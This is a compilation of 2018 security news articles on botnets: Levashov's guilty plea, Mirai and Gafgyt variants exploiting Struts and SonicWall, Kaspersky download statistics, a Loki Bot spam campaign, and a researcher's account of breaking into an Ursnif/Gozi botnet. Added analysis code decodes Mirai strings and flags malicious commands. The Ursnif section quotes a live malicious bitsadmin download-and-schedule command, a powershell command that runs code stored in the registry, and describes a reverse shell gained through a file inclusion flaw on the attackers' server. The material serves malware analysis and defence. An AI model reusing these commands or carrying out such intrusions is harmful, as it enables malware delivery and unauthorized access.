Spamhaus’ entry on Levashov in its Register of Known Spam Operations (ROKSO) describes the Russian as “one of the longest operating criminal spam-lords on the internet.”

Levashov was indicted in the United States on April 20, just days after his arrest in Spain and action taken by authorities to dismantle the Kelihos botnet. He was extradited to the United States in February.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

His sentencing has been scheduled for September 6, 2019, and he will remain in custody until then. It’s unclear why the judge scheduled sentencing for one year from now, but it could indicate that Levashov is working with law enforcement agencies on dismantling other cybercrime operations.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”


Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
10.9.2018 securityaffairs BotNet

Security experts with Unit 42 at Palo Alto Networks have discovered new variants of the Mirai and Gafgyt IoT malware targeting enterprises.
Both botnets appear very interesting for two main reasons:

The new Mirai variant targets the same Apache Struts vulnerability exploited in the 2017 Equifax data breach. The vulnerability affects the Jakarta Multipart parser upload function in Apache Struts and could be exploited by an attacker by sending a maliciously crafted request to a web server running Struts.
The new Gafgyt variant targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
The fact that both malicious codes are targeting Apache Struts and SonicWall could indicate a shift from consumer device targets to enterprise targets.

“These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.” reads the analysis published by Palo Alto Networks.

“All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices.”

In September the experts detected Mirai samples that include exploit code for 16 vulnerabilities; for the first time, the malware targets a vulnerability in Apache Struts.

The samples are hosted on a domain that in August resolved to a different IP address. During that month, the same IP address was intermittently hosting samples of Gafgyt that included exploit code for the CVE-2018-9866 flaw affecting older versions of SonicWall Global Management System (GMS).

The same domain has also been found associated with other Mirai activity in the past.

“For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127.” continues the analysis. “At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.”

Experts noticed that, unlike other variants, the new Mirai samples don’t include brute-force functionality; they use l[.]ocalhost[.]host:47883 as C2 and implement the same encryption scheme as Mirai, with the key 0xdeadf00d.
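The Mirai string obfuscation referred to above is a 32-bit XOR "table key" applied byte by byte to every configuration string (C2 hostname, paths, scanner credentials). The following is an added analysis helper, not code from the page or from Unit 42: it re-implements that scheme so an analyst can decode table entries from a sample keyed with 0xdeadf00d, and shows why the four-byte key collapses to a single-byte XOR. The sample entry is constructed from a typical Mirai table string.

```python
"""
Decoder for Mirai-style obfuscated configuration strings.

Mirai's leaked source (table.c, toggle_obf()) stores each configuration
string XORed with a 32-bit key: every byte is XORed in turn with each of
the key's four bytes. The original code used 0xdeadbeef; the samples
discussed above used 0xdeadf00d. Added example, not the page's own code.
"""
from typing import Optional, Tuple

MIRAI_ORIGINAL_KEY = 0xDEADBEEF
SAMPLE_KEY = 0xDEADF00D  # key reported for the Struts-capable Mirai samples


def key_bytes(table_key: int) -> Tuple[int, int, int, int]:
    """Split the 32-bit key the way Mirai does: k1 = low byte ... k4 = high byte."""
    return tuple((table_key >> shift) & 0xFF for shift in (0, 8, 16, 24))


def effective_key(table_key: int) -> int:
    """XORing with four bytes in sequence collapses to one single-byte XOR key."""
    k = 0
    for b in key_bytes(table_key):
        k ^= b
    return k


def toggle_obf(data: bytes, table_key: int) -> bytes:
    """Re-implementation of Mirai's toggle_obf(); the operation is its own inverse."""
    k1, k2, k3, k4 = key_bytes(table_key)
    out = bytearray(data)
    for i in range(len(out)):
        out[i] ^= k1
        out[i] ^= k2
        out[i] ^= k3
        out[i] ^= k4
    return bytes(out)


def decode_entry(blob: bytes, table_key: int = SAMPLE_KEY) -> str:
    """Decode one table entry; Mirai entries carry a trailing NUL, which is stripped."""
    plain = toggle_obf(blob, table_key)
    return plain.split(b"\x00", 1)[0].decode("latin-1")


def recover_effective_key(blob: bytes, known_prefix: bytes) -> Optional[int]:
    """
    Recover the single-byte effective key from a blob whose plaintext is known
    to start with known_prefix (e.g. b"/bin/busybox"). Returns None when the
    blob is not consistent with a single-byte XOR of that prefix.
    """
    if not known_prefix or len(blob) < len(known_prefix):
        return None
    k = blob[0] ^ known_prefix[0]
    if all((c ^ k) == p for c, p in zip(blob, known_prefix)):
        return k
    return None


# Constructed sample: a table entry obfuscated with the 0xdeadf00d key. The
# plaintext is a typical Mirai table string, not a value taken from the samples.
CONSTRUCTED_ENTRY = toggle_obf(b"/bin/busybox\x00", SAMPLE_KEY)

if __name__ == "__main__":
    print(f"effective single-byte key: 0x{effective_key(SAMPLE_KEY):02x}")
    print(f"decoded entry: {decode_entry(CONSTRUCTED_ENTRY)}")
```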

The Gafgyt samples first appeared in the wild on August 5, a few days after the publication of a Metasploit module for the SonicWall issue. The samples borrow the code from Gafgyt rather than Mirai.

“The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.” concludes Palo Alto Networks.

Further details, including IoCs, are reported in the analysis published by the experts.


What are botnets downloading?

5.9.2018 Kaspersky BotNet
Statistics for the past year on files downloaded by botnets

Spam mailshots with links to malware and bots downloading other malware are just a couple of botnet deployment scenarios. The choice of infectious payload is limited only by the imagination of the botnet operator or customer. It might be ransomware, a banker, a miner, a backdoor; the list goes on, and you don’t need to go far for examples: take Gandcrab and Trik, or Locky and Necurs, for instance. Every day we intercept numerous file-download commands sent to bots of various types and families. Here we present the results of our botnet activity analysis for H2 2017 and H1 2018.

Methodology
Excluded from the statistics are update files downloaded by bots, since their number depends heavily on the algorithm of the particular malware in question and would distort the final distribution. The analysis also excludes configuration files, whose download depends on the botnet algorithm and is not relevant to this article. What’s more, we only took into account unique (in terms of MD5 hash) files. The results are based on the analysis of commands from more than 60,000 different C&C servers associated with 150 bot families and their modifications.

Kaspersky Lab tracks the activity of botnets using Botnet Tracking, a technology that emulates infected computers (bots) to retrieve operational data about the actions of botnet operators.

The total number of unique malicious files downloaded by our bots in H1 2018 fell by 14.5% against H2 2017.

Number of unique malicious files, H2 2017 — H1 2018

Most popular
After analyzing the files downloaded by the bots, we identified the most widespread families. Note that the top of the list of most “popular” downloads changes little over time. In 2018, as last year, the backdoor njRAT accounted for many downloads. Its share among all files downloaded by bots increased from 3.7% to 5.2%, meaning that more than 1 in 20 bot-downloaded files is njRAT. This widespread distribution is due to the variety of versions of the malware and the ease of setting up one’s own backdoor, creating a low entry threshold.

Rank  H2 2017         Share   H1 2018         Share
1     Lethic          17.0%   njRAT           5.2%
2     Neutrino.POS    4.6%    Lethic          5.0%
3     njRAT           3.7%    Khalesi         4.9%
4     Emotet          3.5%    Miners          4.6%
5     Miners          2.9%    Neutrino.POS    2.2%
6     Smoke           1.8%    Edur            1.3%
7     Cutwail         0.7%    PassView        1.3%
8     Ransomware      0.7%    Jimmy           1.1%
9     SpyEye          0.5%    Gandcrab        1.1%
10    Snojan          0.3%    Cutwail         1.1%
Most downloaded threats, H2 2017 — H1 2018

Very often, botnets are used to distribute cryptocurrency mining tools. In H1 2018 miners accounted for 4.6% of all downloaded files, a far higher figure than in H2 2017 (2.9%).

Yet cybercriminal interest in ordinary currencies remains high, as evidenced by the presence of Neutrino.POS and Jimmy in the Top 10. In H2 2017, Neutrino.POS was downloaded in 4.6% of all cases. In 2018, its share in the overall stream of downloaded files declined, but its “cousin” Jimmy helped out by adding 1.1% to the share of banking Trojans.

Distribution map of the Top 10 downloaded threats, H2 2017

In H1 2018, the Trojan Khalesi was in third place in our ranking, accounting for 4.9% of downloaded files. But while in 2017 the Remcos, BetaBot, Smoke, and Panda bots were involved in downloading the Trojan, in 2018 Khalesi was downloaded only by the spam bot Lethic.

On a separate note, the H1 2018 Top 10 features Mail PassView, a legal password recovery tool for various email clients. Distributed via the Remcos backdoor, it is likely used to obtain passwords for victim mailboxes.

The Cutwail, Lethic, and newly rebranded Emotet bots are also firmly rooted in the Top 10.

Compared to H2 2017, the number of ransomware encryptors downloaded by bots has risen this year. Despite the overall decline in the distribution of ransomware programs, botnet operators continue to deliver them to victims. According to our data, most ransomware programs in 2017 were downloaded by the Smoke bot, but in 2018 the top spot was taken by Nitol. GandCrab ransomware is a newcomer to the Top 10 most downloaded families of 2018. It appeared in 2018 and was immediately deployed and distributed by several botnet operators, most actively by Trik.

Distribution map of the Top 10 downloaded threats, H1 2018

In terms of behavior, the clear leaders in both halves are Trojans with such diverse capabilities that it’s difficult to pinpoint their “specialization.” A significant proportion is made up of bankers and backdoors ensuring maximum theft of important information. What’s more, last year’s most common malware included a large number of spam bots, largely due to the above-mentioned Lethic.

Distribution of downloaded files by behavior, H2 2017 — H1 2018

Most “versatile”
Among the families under observation, we identified the most “versatile” — that is, those downloading the largest number of different files. Such diversity can be the result of several factors:

Different botnets from the same family are managed by different operators with varying objectives.
Operators “lease” their botnets, allowing them to be used to distribute malware.
A botnet changes its “specialization” (for example, Emotet turned from a banking Trojan into a spam bot).
In 2018, as in 2017, the most “versatile” bots were Hworm, Smoke, and BetaBot (a.k.a. Neurevt).

Distribution of downloaded files by behavior for Hworm, H2 2017 — H1 2018

Distribution of downloaded files by behavior for Smoke, H2 2017 — H1 2018

Distribution of downloaded files by behavior for Betabot, H2 2017 — H1 2018

As we already mentioned, hidden mining software is very popular, as confirmed by the statistics. Despite the variety of downloaded malware, miners invariably end up in the Top 3.

Backdoors also feature heavily due to the wide-ranging options they provide for cybercriminals, from saving screenshots and keystrokes to direct control over the target device.

Most “international”
In terms of territorial distribution of control servers, the backdoor Njrat unsurprisingly claimed the “most international” prize, with C&C centers in 99 countries. This geographical scope is down to the ease of configuring a personal backdoor, allowing anyone to create their own botnet with minimal knowledge of malware development.

Distribution map of Njrat C&C centers, H2 2017 — H1 2018

Next come the backdoors DarkComet and NanoCore RAT. They share silver and bronze, having C&Cs in almost 80 countries worldwide. Despite the arrest of the creator of NanoCore, he managed to sell the source code of his privately developed RAT, which is now actively used by other cybercriminals.

Distribution map of DarkComet C&C centers, H2 2017 — H1 2018

Distribution map of NanoCore RAT C&C centers, H2 2017 — H1 2018

A look at the geography of infection targets reveals that another backdoor, QRAT, has the largest reach. In H2 2017, we registered infection attempts in 190 countries, and this year QRAT added two more countries, bringing the total to 192.

QRAT distribution map, H2 2017 — H1 2018

This extensive scope is due to the SaaS (Software-as-a-Service), or rather MaaS (Malware-as-a-Service), distribution model: QRAT can be purchased for 30 or 90 days, or for one year. Its cross-platform nature (the malware is written in Java) also plays a role.

Conclusion
By intercepting bot commands, we can track the latest trends in the world of virus writers and provide maximum protection for our users.

Here are the main trends that we identified from analyzing files downloaded by bots:

The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for mining cryptocurrency.
Backdoors consistently make up the bulk of downloads; that is, botnet operators are keen to gain maximum possible control over infected devices.
The number of downloaded droppers is also on the rise, indicative of attacks that are multistage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it’s too soon to speak of an overall reduction in number, since they are often delivered by droppers (see above).
Increasingly, botnets are leased according to the needs of the customer, and in many cases it is difficult to pinpoint the “specialization” of the botnet.


Kaspersky warns of a new Loki Bot campaign targeting corporate mailboxes
4.9.2018 securityaffairs BotNet

Security experts from Kaspersky Lab have uncovered a new spam campaign leveraging the Loki Bot malware to target corporate mailboxes.
The Loki Bot attacks started in July and aimed at stealing passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets.

Loki Bot operators employ various social engineering techniques to trick victims into opening weaponized attachments that deploy the Loki Bot stealer.

The messages use attachments with .iso extensions, a file type that works as a container for delivering malware.

“Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot.” reads the analysis published by Kaspersky.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.”

The messages masquerade as notifications from other companies, or as orders and offers.

Threat actors are sending out copies of Loki Bot to company email addresses that were available from public sources or from the companies’ own websites.


Experts observed different spam messages including fake notifications from well-known companies, fake notifications containing financial documents, and fake orders or offers.

Researchers highlighted the importance for organizations of adopting security measures that include both technical protections and training for employees.

“Every year we observe an increase in spam attacks on the corporate sector.” Kaspersky concludes.

“The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc.”


Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy
31.8.2018 securityaffairs BotNet

Today I’d like to share a full path analysis, including a KickBack attack, which led me to gain full access to an entire Ursniff/Gozi botnet.
In other words: from a simple “Malware Sample” to “Pwn the Attacker Infrastructure”.
NB: Federal Police have already been alerted on this topic, as well as national and international CERTs/CSIRTs (on August 26/27 2018). Attacked companies and compromised hosts should already have been contacted. If you have heard nothing about this topic until now, it means, with high probability, that you/your company is not involved in this threat. I am not going to publicly disclose the victims’ IPs.

This disclosure follows the ethical disclosure procedure, which is close to the responsible disclosure procedure but focused mainly on incidents rather than on vulnerabilities.
Since blogging is not my business (I write on my personal blog to share knowledge on Cyber Security), I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the found malware code, nor the malware Command and Control code, nor details on the attacker’s group, since I won’t hand future attackers new malware source code ready to be used.
My entire “Cyber adventure” began with a simple email containing a .ZIP file named “Nuovo Documento1.zip” as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041). Inside the ZIP was a .VBS file (sha256: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which, at the time (August 21 2018), was totally unknown to VirusTotal (unknown = not yet analysed) and was ready to be started through a double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like de-obfuscating hidden code (every time it’s like a personal challenge). After some hardworking minutes ( 😀 ) Stage1 was totally de-obfuscated and ready to be read in plain text. It appeared clear to me that Stage1 was in charge of evading three main AVs, namely Kaspersky Lab, Panda Security, and Trend Micro, by running simple scans on Microsoft Regedit, and of dropping and executing additional software.

Stage1. Obfuscation
Indeed, if none of the searched AVs were found on the target system, Stage1 acted as a simple downloader. The specific actions performed follow:

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 dropped and executed a brand new PE file named rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admins can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by the Anunak APT during bank frauds in the past few years.

The Stage2 analysis (huge step ahead here) brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section with high entropy. It is a significant indication of decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high entropy of the added section

Indeed, Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way that many AV engines were not able to detect it, since the signature differed from the original payload. Finally, the unpacked payload presented many interesting features; for example, it was weaponized with evasion techniques such as: timing delay (through sleep), loop delay by calling the GetSystemTimeAsFileTime API 9979141 times, BIOS version harvesting, system manufacturer information and system fingerprinting to check if it was running in a virtual or physical environment. It installed itself in the Windows auto-run registry to get persistence on the victim machine. The following action was performed while running with the background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6’).Audibrkr))
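The bitsadmin /transfer plus schtasks /create chain from Stage1 and the powershell invoke-expression fed from a registry value in Stage3 are living-off-the-land patterns that stand out in process-creation telemetry. The following is an added example, not code from the post or from Yoroi, that triages log lines modelled on the commands quoted above; the pid|image|command line record format and the benign look-alike records are constructed.

```python
"""
Process-creation log triage for the living-off-the-land patterns in this
analysis: bitsadmin /transfer dropping a payload into a user temp directory,
schtasks /create running that payload, and powershell invoke-expression on a
registry value. Added example; the log format and sample lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

# Per-user temp directory, accepting either slash style (the quoted command mixes both)
USER_TEMP = re.compile(r"appdata[\\/]+local[\\/]+temp", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    command: str


def check_bitsadmin_to_user_temp(cmd: str) -> Optional[str]:
    """bitsadmin is a legitimate admin tool; a /transfer job writing into a user temp dir is not."""
    low = cmd.lower()
    if "bitsadmin" in low and "/transfer" in low and USER_TEMP.search(cmd):
        return "bitsadmin_download_to_user_temp"
    return None


def check_schtasks_runs_temp_binary(cmd: str) -> Optional[str]:
    """schtasks /create whose /tr action points at a binary under the user temp dir."""
    m = re.search(r"schtasks\s+/create\b.*?/tr\s+(\S+)", cmd, re.IGNORECASE)
    if m and USER_TEMP.search(m.group(1)):
        return "schtasks_runs_binary_from_user_temp"
    return None


def check_powershell_iex_from_registry(cmd: str) -> Optional[str]:
    """powershell evaluating code read out of a registry value (the Stage3 persistence trick)."""
    low = cmd.lower()
    evaluates = "invoke-expression" in low or re.search(r"\biex\b", low) is not None
    reads_registry = "get-itemproperty" in low or "hkcu:" in low or "hklm:" in low
    if "powershell" in low and evaluates and reads_registry:
        return "powershell_iex_from_registry_value"
    return None


CHECKS: List[Callable[[str], Optional[str]]] = [
    check_bitsadmin_to_user_temp,
    check_schtasks_runs_temp_binary,
    check_powershell_iex_from_registry,
]


def parse_log(text: str) -> List[Tuple[int, str, str]]:
    """Parse constructed 'pid|image|command line' records, skipping blank lines."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, image, cmd = line.split("|", 2)
        records.append((int(pid), image, cmd))
    return records


def triage(text: str) -> List[Finding]:
    """Run every check over every record; one Finding per (rule, record) hit, in log order."""
    findings = []
    for pid, _image, cmd in parse_log(text):
        for check in CHECKS:
            rule = check(cmd)
            if rule:
                findings.append(Finding(rule, pid, cmd))
    return findings


# Constructed sample log. Records 1001 and 1003 reproduce the commands quoted in
# the post; 1002 and 1004 are benign look-alikes (bitsadmin to ProgramData, a
# powershell script run) that must not fire.
SAMPLE_LOG = r"""
1001|C:\Windows\System32\cmd.exe|"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground http://englandlistings.com/pagverd75.php C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
1002|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer patchjob /priority normal https://updates.example.test/patch.msi C:\ProgramData\Patches\patch.msi
1003|C:\Windows\System32\cmd.exe|cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6').Audibrkr))
1004|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -File C:\Scripts\inventory.ps1
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"pid {f.pid}: {f.rule}")
```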

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.
"C:\Users\J8913~1.SEA\AppData\Local\Temp\2e6d628189703d9ad4db9e9d164775bd.exe"

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2

C:\Windows\system32\SearchIndexer.exe /Embedding

taskhost.exe SYSTEM

C:\Windows\System32\wsqmcons.exe

taskhost.exe $(Arg0)

C:\Windows\System32\svchost.exe -k WerSvcGroup

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\WerFault.exe -u -p 2524 -s 288

"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

nslookup myip.opendns.com resolver1.opendns.com
Stage3 finally connects back to the C2s once it has checked its own IP address. Two main C2s were observed:
C2 level_1 (for domains and IPs check the IoC section). Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to hand over stolen information. It’s an Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, grabbing the user clipboard and by performing man-in-the-browser attacks against major websites such as PayPal, Gmail, Microsoft and many online services.
So far so good. Everything looked like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, from my personal point of view, was “handmade” and pretty “young” as an implementation, by which I mean HTML with no client-side controls, no clickjacking controls and no special login tokens. According to Yoroi’s mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and collaborating with local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight cyber crime.
Fortunately, I spotted a file inclusion vulnerability in the Command and Control which let me in! The following image shows a reverse shell I spawned on the attacker’s command and control.

Now, I was able to download the entire Command and Control source code (PHP) and study it! The study of this brand new C2 took me to the next level. First of all, I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) in it, according to the Anunak APT report made by Group-IB.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database
Additional investigations on the database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least two additional layers of C2 were present. While the level_1 was weaponising the malware implant, the level_2 was collecting information from victims. Thanks to the source code study it was possible to find more 0-days to be used against the C2 and to break into the C2 level_2. Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a “test” connection from the attacker and focus on decrypting such a connection. Fortunately, everything needed was written in the command and control source code. In this specific case, the following function was fundamental to get to clear text!

URL Decryption Function
The eKey was straight in the DB and the decryption function was quite easy to reverse. Finally it was possible to figure out how to decrypt the attacker’s testing string (the first transaction available in the logs) and voilà, it was possible to check in to the attacker’s email 😀 !

Attacker eMail: VPS credentials
Once “in”, a new need arose: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure, it was possible to get access to the entire VPS control panel. At this point the general infrastructure picture* was clear, as was how to block the threat, not only for customers but for everybody!

Attacker VPS Environment

Sharing these results for free would allow vendors (for example: AV companies, firewall companies, IDS companies and so on) to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might raise our voice against cyber criminals!
Summary:

In this post, I described the main steps that took me to gain full access to a big Ursniff/Gozi botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on the attacker infrastructure). The threat appeared very well structured: Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up by a criminal organisation and not by a single person.
The following graph shows the victim distribution in August 2018. The main targets currently are the USA with 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims in August 2018 number several thousand.

Victims Distribution on August 24 2018

During the analysis it was interesting to observe that the attacker was acquiring domains from an apparent “black market” where many actors were selling and buying “apparently compromised domains” (no evidence for this last sentence, only a feeling). The system (following picture) looks like a trading platform with a public API that third-party systems can operate, like stock operators.

Apparent Domain BlackMarket
Hope you enjoyed the reading.

Further details, including the Indicators of compromise, are reported in the analysis published by Marco Ramilli on his blog.


Federal prosecutors indicted a 20-year-old man who built the Satori botnet
31.8.2018 securityaffairs BotNet

A youngster (20) from Washington was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a Mirai variant dubbed Satori.
MalwareMustDie Team: “It’s time for every teenager or young man to know that playing with malware is the fastest way to finish in the jail”

